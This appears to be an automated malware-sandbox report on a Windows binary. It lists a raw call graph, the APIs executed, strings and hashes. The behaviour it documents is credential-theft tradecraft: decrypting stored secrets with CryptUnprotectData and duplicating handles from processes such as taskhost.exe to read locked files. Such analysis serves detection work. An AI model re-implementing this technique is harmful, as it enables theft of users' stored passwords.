39061->39063 39062->39059 39063->39012 39066 40aa04 free 39065->39066 39067 40e491 39066->39067 39067->39060 39069 40e497 free 39067->39069 39068->39059 39069->39060 39071 40e376 memset 39163 40aa29 39071->39163 39074->39059 39075->39059 39076->39059 39077->39059 39078->39059 39079->38994 39081 406294 CloseHandle 39080->39081 39082 406224 39081->39082 39083 4096c3 CreateFileW 39082->39083 39084 40622d 39083->39084 39085 406281 GetLastError 39084->39085 39086 40a2ef ReadFile 39084->39086 39088 40625a 39085->39088 39087 406244 39086->39087 39087->39085 39089 40624b 39087->39089 39088->39016 39091 40dd85 memset 39088->39091 39089->39088 39090 406777 19 API calls 39089->39090 39090->39088 39092 409bca GetModuleFileNameW 39091->39092 39093 40ddbe CreateFileW 39092->39093 39096 40ddf1 39093->39096 39094 40afcf ??2@YAPAXI ??3@YAXPAX 39094->39096 39095 41352f 9 API calls 39095->39096 39096->39094 39096->39095 39097 40de0b NtQuerySystemInformation 39096->39097 39098 40de3b CloseHandle GetCurrentProcessId 39096->39098 39097->39096 39099 40de54 39098->39099 39100 413d4c 46 API calls 39099->39100 39108 40de88 39100->39108 39101 40e00c 39102 413d29 free FreeLibrary 39101->39102 39103 40e014 39102->39103 39103->39016 39103->39019 39104 40dea9 _wcsicmp 39105 40dee7 OpenProcess 39104->39105 39106 40debd _wcsicmp 39104->39106 39105->39108 39106->39105 39107 40ded0 _wcsicmp 39106->39107 39107->39105 39107->39108 39108->39101 39108->39104 39109 40dfef CloseHandle 39108->39109 39110 40df78 39108->39110 39111 40df23 GetCurrentProcess DuplicateHandle 39108->39111 39114 40df8f CloseHandle 39108->39114 39109->39108 39110->39109 39110->39114 39115 40dfae _wcsicmp 39110->39115 39111->39108 39112 40df4c memset 39111->39112 39113 41352f 9 API calls 39112->39113 39113->39108 39114->39110 39115->39108 39115->39110 39117 409a74 GetTempFileNameW 39116->39117 39118 409a66 GetWindowsDirectoryW 39116->39118 39117->39029 39118->39117 39119->39031 39121 406bd5 39120->39121 39122 406bad 39120->39122 39124 4066bf free malloc memcpy free free 39121->39124 39129 406c0f 39121->39129 39122->39121 39123 406bba _wcsicmp 39122->39123 39123->39121 39123->39122 39125 406be5 39124->39125 39126 40afcf ??2@YAPAXI ??3@YAXPAX 39125->39126 39125->39129 39127 406bff 39126->39127 39128 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39127->39128 39128->39129 39129->39040 39129->39041 39132 406ed1 39130->39132 39131 407424 39131->39046 39132->39131 39133 40b633 free 39132->39133 39141 406f4e 39133->39141 39134 406f73 memset 39134->39141 39135 407080 free 39135->39141 39136 40718b 39138 4069df memcpy 39136->39138 39149 40730b 39136->39149 39137 4099f4 malloc memcpy free 39137->39141 39150 4071f1 39138->39150 39139 4069df memcpy 39139->39141 39140 4069df memcpy 39142 4070d4 39140->39142 39141->39134 39141->39135 39141->39137 39141->39139 39141->39142 39143 406a10 memcpy 39141->39143 39144 406aa2 memcpy 39141->39144 39142->39131 39142->39136 39142->39140 39145 40717b 39142->39145 39143->39141 39144->39141 39146 4069df memcpy 39145->39146 39146->39136 39147 406c5a 6 API calls 39147->39149 39148 406c28 ??2@YAPAXI ??3@YAXPAX 39148->39149 39149->39131 39149->39147 39149->39148 39150->39149 39151 4069df memcpy 39150->39151 39151->39150 39153 4069c4 ??3@YAXPAX 39152->39153 39154 4069af 39153->39154 39155 40b633 free 39154->39155 39156 4069ba 39155->39156 39157 40b04b ??3@YAXPAX 39156->39157 39158 4069c2 39157->39158 39158->39012 39159->39046 39160->39046 39161->39046 39162->39071 39164 40aa33 39163->39164 39165 40aa63 39163->39165 39166 40aa44 39164->39166 39167 40aa38 wcslen 39164->39167 39165->39059 39168 40a9ce malloc memcpy free free 39166->39168 39167->39166 39169 40aa4d 39168->39169 39169->39165 39170 40aa51 memcpy 39169->39170 39170->39165 39171->39059 39172->39059 39177 40a980 39173->39177 39174 40a8bb 39174->38919 39174->38920 39175 40a995 _wcsicmp 39175->39177 39176 40a99c wcscmp 39176->39177 39177->39174 39177->39175 39177->39176 39178->38923 39179->38927 39181 40aa23 RegEnumValueW 39180->39181 39181->38934 39181->38935 39183 405335 39182->39183 39184 40522a 39182->39184 39183->38513 39185 40b2cc 27 API calls 39184->39185 39186 405234 39185->39186 39187 40a804 8 API calls 39186->39187 39188 40523a 39187->39188 39227 40b273 39188->39227 39190 405248 _mbscpy _mbscat GetProcAddress 39191 40b273 27 API calls 39190->39191 39192 405279 39191->39192 39230 405211 GetProcAddress 39192->39230 39194 405282 39195 40b273 27 API calls 39194->39195 39196 40528f 39195->39196 39231 405211 GetProcAddress 39196->39231 39198 405298 39199 40b273 27 API calls 39198->39199 39200 4052a5 39199->39200 39232 405211 GetProcAddress 39200->39232 39202 4052ae 39203 40b273 27 API calls 39202->39203 39204 4052bb 39203->39204 39233 405211 GetProcAddress 39204->39233 39206 4052c4 39207 40b273 27 API calls 39206->39207 39208 4052d1 39207->39208 39234 405211 GetProcAddress 39208->39234 39210 4052da 39211 40b273 27 API calls 39210->39211 39212 4052e7 39211->39212 39235 405211 GetProcAddress 39212->39235 39214 4052f0 39215 40b273 27 API calls 39214->39215 39216 4052fd 39215->39216 39236 405211 GetProcAddress 39216->39236 39218 405306 39219 40b273 27 API calls 39218->39219 39220 405313 39219->39220 39237 405211 GetProcAddress 39220->39237 39222 40531c 39223 40b273 27 API calls 39222->39223 39224 405329 39223->39224 39228 40b58d 27 API calls 39227->39228 39229 40b18c 39228->39229 39229->39190 39230->39194 39231->39198 39232->39202 39233->39206 39234->39210 39235->39214 39236->39218 39237->39222 39240 405220 39 API calls 39239->39240 39241 405369 39240->39241 39241->38952 39241->38953 39242->38955 39243->38959 39244->38956 39245->38953 39247 40440c FreeLibrary 39246->39247 39248 40436d 39247->39248 39249 40a804 8 API calls 39248->39249 39250 404377 39249->39250 39251 404383 39250->39251 39252 404405 39250->39252 39253 40b273 27 API calls 39251->39253 39252->38523 39252->38524 39252->38525 39254 40438d GetProcAddress 39253->39254 39255 40b273 27 API calls 39254->39255 39256 4043a7 GetProcAddress 39255->39256 39257 40b273 27 API calls 39256->39257 39258 4043ba GetProcAddress 39257->39258 39259 40b273 27 API calls 39258->39259 39260 4043ce GetProcAddress 39259->39260 39261 40b273 27 API calls 39260->39261 39262 4043e2 GetProcAddress 39261->39262 39263 4043f1 39262->39263 39264 4043f7 39263->39264 39265 40440c FreeLibrary 39263->39265 39264->39252 39265->39252 39267 404413 FreeLibrary 39266->39267 39268 40441e 39266->39268 39267->39268 39268->38541 39269->38537 39271 40447e 39270->39271 39272 40442e 39270->39272 39273 404485 CryptUnprotectData 39271->39273 39274 40449c 39271->39274 39275 40b2cc 27 API calls 39272->39275 39273->39274 39274->38537 39276 404438 39275->39276 39277 40a804 8 API calls 39276->39277 39278 40443e 39277->39278 39279 404445 39278->39279 39280 404467 39278->39280 39281 40b273 27 API calls 39279->39281 39280->39271 39283 404475 FreeLibrary 39280->39283 39282 40444f GetProcAddress 39281->39282 39282->39280 39284 404460 39282->39284 39283->39271 39284->39280 39286 4135f6 39285->39286 39287 4135eb FreeLibrary 39285->39287 39286->38544 39287->39286 39289 4449c4 39288->39289 39290 444a52 39288->39290 39291 40b2cc 27 API calls 39289->39291 39290->38561 39290->38562 39292 4449cb 39291->39292 39293 40a804 8 API calls 39292->39293 39294 4449d1 39293->39294 39295 40b273 27 API calls 39294->39295 39296 4449dc GetProcAddress 39295->39296 39297 40b273 27 API calls 39296->39297 39298 4449f3 GetProcAddress 39297->39298 39299 40b273 27 API calls 39298->39299 39300 444a04 GetProcAddress 39299->39300 39301 40b273 27 API calls 39300->39301 39302 444a15 GetProcAddress 39301->39302 39303 40b273 27 API calls 39302->39303 39304 444a26 GetProcAddress 39303->39304 39305 40b273 27 API calls 39304->39305 39309->38572 39310->38572 39311->38572 39312->38572 39313->38563 39315 403a29 39314->39315 39329 403bed memset memset 39315->39329 39317 403ae7 39342 40b1ab free free 39317->39342 39319 403a3f memset 39323 403a2f 39319->39323 39320 403aef 39320->38580 39321 40a8d0 7 API calls 39321->39323 39322 409d1f 6 API calls 39322->39323 39323->39317 39323->39319 39323->39321 39323->39322 39324 409b98 GetFileAttributesW 39323->39324 39324->39323 39326 40a051 GetFileTime CloseHandle 39325->39326 39327 4039ca CompareFileTime 39325->39327 39326->39327 39327->38580 39328->38579 39330 414c2e 17 API calls 39329->39330 39331 403c38 39330->39331 39332 409719 2 API calls 39331->39332 39333 403c3f wcscat 39332->39333 39334 414c2e 17 API calls 39333->39334 39335 403c61 39334->39335 39336 409719 2 API calls 39335->39336 39337 403c68 wcscat 39336->39337 39343 403af5 39337->39343 39340 403af5 20 API calls 39341 403c95 39340->39341 39341->39323 39342->39320 39344 403b02 39343->39344 39345 40ae18 9 API calls 39344->39345 39353 403b37 39345->39353 39346 403bdb 39347 40aebe FindClose 39346->39347 39348 403be6 39347->39348 39348->39340 39349 40ae18 9 API calls 39349->39353 39350 40ae51 9 API calls 39350->39353 39351 40add4 wcscmp wcscmp 39351->39353 39352 40aebe FindClose 39352->39353 39353->39346 39353->39349 39353->39350 39353->39351 39353->39352 39354 40a8d0 7 API calls 39353->39354 39354->39353 39356 409d1f 6 API calls 39355->39356 39357 404190 39356->39357 39370 409b98 GetFileAttributesW 39357->39370 39359 40419c 39360 4041a7 6 API calls 39359->39360 39361 40435c 39359->39361 39362 40424f 39360->39362 39361->38606 39362->39361 39364 40425e memset 39362->39364 39366 409d1f 6 API calls 39362->39366 39367 40a8ab 9 API calls 39362->39367 39371 414842 39362->39371 39364->39362 39365 404296 wcscpy 39364->39365 39365->39362 39366->39362 39368 4042b6 memset memset _snwprintf wcscpy 39367->39368 39368->39362 39369->38604 39370->39359 39374 41443e 39371->39374 39373 414866 39373->39362 39375 41444b 39374->39375 39376 414451 39375->39376 39377 4144a3 GetPrivateProfileStringW 39375->39377 39378 414491 39376->39378 39379 414455 wcschr 39376->39379 39377->39373 39381 414495 WritePrivateProfileStringW 39378->39381 39379->39378 39380 414463 _snwprintf 39379->39380 39380->39381 39381->39373 39382->38610 39384 40b2cc 27 API calls 39383->39384 39385 409615 39384->39385 39386 409d1f 6 API calls 39385->39386 39387 409625 39386->39387 39412 409b98 GetFileAttributesW 39387->39412 39389 409634 39390 409648 39389->39390 39413 4091b8 memset 39389->39413 39392 40b2cc 27 API calls 39390->39392 39395 408801 39390->39395 39393 40965d 39392->39393 39394 409d1f 6 API calls 39393->39394 39396 40966d 39394->39396 39395->38613 39395->38640 39465 409b98 GetFileAttributesW 39396->39465 39398 40967c 39398->39395 39399 409681 39398->39399 39466 409529 72 API calls 39399->39466 39401 409690 39401->39395 39412->39389 39467 40a6e6 WideCharToMultiByte 39413->39467 39415 409202 39468 444432 39415->39468 39418 40b273 27 API calls 39419 409236 39418->39419 39514 438552 39419->39514 39422 409383 39424 40b273 27 API calls 39422->39424 39425 409399 39424->39425 39428 438552 134 API calls 39425->39428 39445 40951d 39445->39390 39465->39398 39466->39401 39467->39415 39469 4438b5 11 API calls 39468->39469 39470 44444c 39469->39470 39471 409215 39470->39471 39564 415a6d 39470->39564 39471->39418 39471->39445 39473 4442e6 11 API calls 39475 44469e 39473->39475 39474 444486 39476 4444b9 memcpy 39474->39476 39513 4444a4 39474->39513 39475->39471 39478 443d90 111 API calls 39475->39478 39568 415258 39476->39568 39478->39471 39479 444524 39480 444541 39479->39480 39481 44452a 39479->39481 39571 444316 39480->39571 39482 416935 16 API calls 39481->39482 39482->39513 39485 444316 18 API calls 39513->39473 39685 438460 39514->39685 39516 409240 39516->39422 39517 4251c4 39516->39517 39736 424f07 39517->39736 39565 415a77 39564->39565 39566 415a8d 39565->39566 39567 415a7e memset 39565->39567 39566->39474 39567->39566 39569 4438b5 11 API calls 39568->39569 39570 41525d 39569->39570 39570->39479 39572 444328 39571->39572 39573 444423 39572->39573 39574 44434e 39572->39574 39638 4446ea 11 API calls 39573->39638 39575 432d4e 3 API calls 39574->39575 39577 44435a 39575->39577 39579 444375 39577->39579 39584 44438b 39577->39584 39578 432d4e 3 API calls 39582 444381 39582->39485 39584->39578 39638->39582 39697 41703f 39685->39697 39687 43847a 39688 43848a 39687->39688 39689 43847e 39687->39689 39704 438270 39688->39704 39734 4446ea 11 API calls 39689->39734 39696 438488 39696->39516 39698 417044 39697->39698 39699 41705c 39697->39699 39701 416760 11 API calls 39698->39701 39703 417055 39698->39703 39700 417075 39699->39700 39702 41707a 11 API calls 39699->39702 39700->39687 39701->39703 39702->39698 39703->39687 39705 415a91 memset 39704->39705 39706 43828d 39705->39706 39707 438297 39706->39707 39708 438341 39706->39708 39710 4382d6 39706->39710 39709 415c7d 16 API calls 39707->39709 39711 44358f 19 API calls 39708->39711 39712 438458 39709->39712 39713 4382fb 39710->39713 39714 4382db 39710->39714 39723 438318 39711->39723 39712->39696 39735 424f26 123 API calls 39712->39735 39716 415c23 memcpy 39713->39716 39715 416935 16 API calls 39714->39715 39717 4382e9 39715->39717 39718 438305 39716->39718 39718->39723 39720 438373 39722 43819e 115 API calls 39722->39720 39723->39720 39723->39722 39734->39696 39737 424f1f 39736->39737 39738 424f0c 39736->39738 39835 413f4f 39808->39835 39811 413f37 K32GetModuleFileNameExW 39812 413f4a 39811->39812 39812->38673 39814 413969 wcscpy 39813->39814 39815 41396c wcschr 39813->39815 39825 413a3a 39814->39825 39815->39814 39817 41398e 39815->39817 39840 4097f7 wcslen wcslen _memicmp 39817->39840 39819 41399a 39820 4139a4 memset 39819->39820 39821 4139e6 39819->39821 39841 409dd5 GetWindowsDirectoryW wcscpy 39820->39841 39823 413a31 wcscpy 39821->39823 39824 4139ec memset 39821->39824 39823->39825 39842 409dd5 GetWindowsDirectoryW wcscpy 39824->39842 39825->38673 39826 4139c9 wcscpy wcscat 39826->39825 39828 413a11 memcpy wcscat 39828->39825 39830 413cb0 GetModuleHandleW 39829->39830 39831 413cda 39829->39831 39830->39831 39834 413cbf GetProcAddress 39830->39834 39832 413ce3 GetProcessTimes 39831->39832 39833 413cf6 39831->39833 39832->38675 39833->38675 39834->39831 39836 413f2f 39835->39836 39837 413f54 39835->39837 39836->39811 39836->39812 39838 40a804 8 API calls 39837->39838 39839 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39838->39839 39839->39836 39840->39819 39841->39826 39842->39828 39843->38695 39844->38718 39846 409cf9 GetVersionExW 39845->39846 39847 409d0a 39845->39847 39846->39847 39847->38724 39847->38730 39848->38731 39849->38735 39850->38737 39851->38803 39853 40bba5 39852->39853 39897 40cc26 39853->39897 39856 40bd4b 39925 40cc0c 39856->39925 39861 40b2cc 27 API calls 39862 40bbef 39861->39862 39918 40ccf0 39862->39918 39864 40bbf5 39864->39856 39922 40ccb4 39864->39922 39867 40cf04 17 API calls 39868 40bc2e 39867->39868 39869 40bd43 39868->39869 39870 40b2cc 27 API calls 39868->39870 39871 40cc0c 4 API calls 39869->39871 39872 40bc40 39870->39872 39871->39856 39873 40ccf0 _wcsicmp 39872->39873 39874 40bc46 39873->39874 39874->39869 39875 40bc61 memset memset WideCharToMultiByte 39874->39875 39932 40103c strlen 39875->39932 39877 40bcc0 39878 40b273 27 API calls 39877->39878 39879 40bcd0 memcmp 39878->39879 39879->39869 39880 40bce2 39879->39880 39881 404423 38 API calls 39880->39881 39882 40bd10 39881->39882 39882->39869 39883 40bd3a LocalFree 39882->39883 39884 40bd1f memcpy 39882->39884 39883->39869 39884->39883 39885->38818 39886->38855 39887->38855 39888->38855 39889->38855 39890->38855 39891->38855 39892->38855 39893->38855 39894->38855 39895->38830 39896->38852 39933 4096c3 CreateFileW 39897->39933 39899 40cc34 39900 40cc3d GetFileSize 39899->39900 39908 40bbca 39899->39908 39901 40afcf 2 API calls 39900->39901 39902 40cc64 39901->39902 39934 40a2ef ReadFile 39902->39934 39904 40cc71 39935 40ab4a MultiByteToWideChar 39904->39935 39906 40cc95 CloseHandle 39907 40b04b ??3@YAXPAX 39906->39907 39907->39908 39908->39856 39909 40cf04 39908->39909 39910 40b633 free 39909->39910 39911 40cf14 39910->39911 39941 40b1ab free free 39911->39941 39913 40cf1b 39914 40cfef 39913->39914 39917 40bbdd 39913->39917 39942 40cd4b 39913->39942 39916 40cd4b 14 API calls 39914->39916 39916->39917 39917->39856 39917->39861 39919 40ccfd 39918->39919 39921 40cd3f 39918->39921 39920 40cd26 _wcsicmp 39919->39920 39919->39921 39920->39919 39920->39921 39921->39864 39923 40aa29 6 API calls 39922->39923 39924 40bc26 39923->39924 39924->39867 39926 40b633 free 39925->39926 39927 40cc15 39926->39927 39928 40aa04 free 39927->39928 39929 40cc1d 39928->39929 39983 40b1ab free free 39929->39983 39931 40b7d4 memset CreateFileW 39931->38810 39931->38811 39932->39877 39933->39899 39934->39904 39936 40ab93 39935->39936 39937 40ab6b 39935->39937 39936->39906 39938 40a9ce 4 API calls 39937->39938 39939 40ab74 39938->39939 39940 40ab7c MultiByteToWideChar 39939->39940 39940->39936 39941->39913 39943 40cd7b 39942->39943 39944 40aa29 6 API calls 39943->39944 39948 40cd89 39944->39948 39945 40cef5 39946 40aa04 free 39945->39946 39947 40cefd 39946->39947 39947->39913 39948->39945 39949 40aa29 6 API calls 39948->39949 39950 40ce1d 39949->39950 39951 40aa29 6 API calls 39950->39951 39952 40ce3e 39951->39952 39953 40ce6a 39952->39953 39976 40abb7 wcslen memmove 39952->39976 39954 40ce9f 39953->39954 39979 40abb7 wcslen memmove 39953->39979 39957 40a8d0 7 API calls 39954->39957 39960 40ceb5 39957->39960 39958 40ce56 39977 40aa71 wcslen 39958->39977 39959 40ce8b 39980 40aa71 wcslen 39959->39980 39964 40a8d0 7 API calls 39960->39964 39963 40ce5e 39978 40abb7 wcslen memmove 39963->39978 39967 40cecb 39964->39967 39965 40ce93 39981 40abb7 wcslen memmove 39965->39981 39982 40d00b malloc memcpy free free 39967->39982 39970 40cedd 39971 40aa04 free 39970->39971 39972 40cee5 39971->39972 39973 40aa04 free 39972->39973 39974 40ceed 39973->39974 39975 40aa04 free 39974->39975 39975->39945 39976->39958 39977->39963 39978->39953 39979->39959 39980->39965 39981->39954 39982->39970 39983->39931 39984->38870 39985->38878 40483 441819 40486 430737 40483->40486 40485 441825 40487 430756 40486->40487 40499 43076d 40486->40499 40488 430774 40487->40488 40489 43075f 40487->40489 40500 43034a 40488->40500 40504 4169a7 11 API calls 40489->40504 40492 4307ce 40494 430819 memset 40492->40494 40495 415b2c 11 API calls 40492->40495 40493 43077e 40493->40492 40497 4307fa 40493->40497 40493->40499 40494->40499 40496 4307e9 40495->40496 40496->40494 40496->40499 40505 4169a7 11 API calls 40497->40505 40499->40485 40501 43034e 40500->40501 40503 430359 40500->40503 40506 415c23 memcpy 40501->40506 40503->40493 40504->40499 40505->40499 40506->40503 40507 41493c EnumResourceNamesW

                                                                                                                  Executed Functions

                                                                                                                  Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040DDAD
                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                  • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                  • memset.MSVCRT ref: 0040DF5F
                                                                                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                  • API String ID: 708747863-3398334509
                                                                                                                  • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                  • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                  Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 644->645 646 413ebf-413ec6 free 644->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                  • free.MSVCRT ref: 00413EC1
                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                  • API String ID: 1344430650-1740548384
                                                                                                                  • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                  • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                  Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
